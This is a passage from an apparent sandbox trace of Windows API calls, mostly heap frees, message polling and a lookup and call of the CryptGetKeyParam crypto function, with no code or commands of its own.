lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0089.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0089.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0089.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.015] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.015] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.015] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.016] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.017] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.017] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0089.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0089.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0089.069] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0089.069] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e25f0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e25f0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.071] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.071] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.072] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0089.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0089.073] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0089.073] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.144] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0089.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 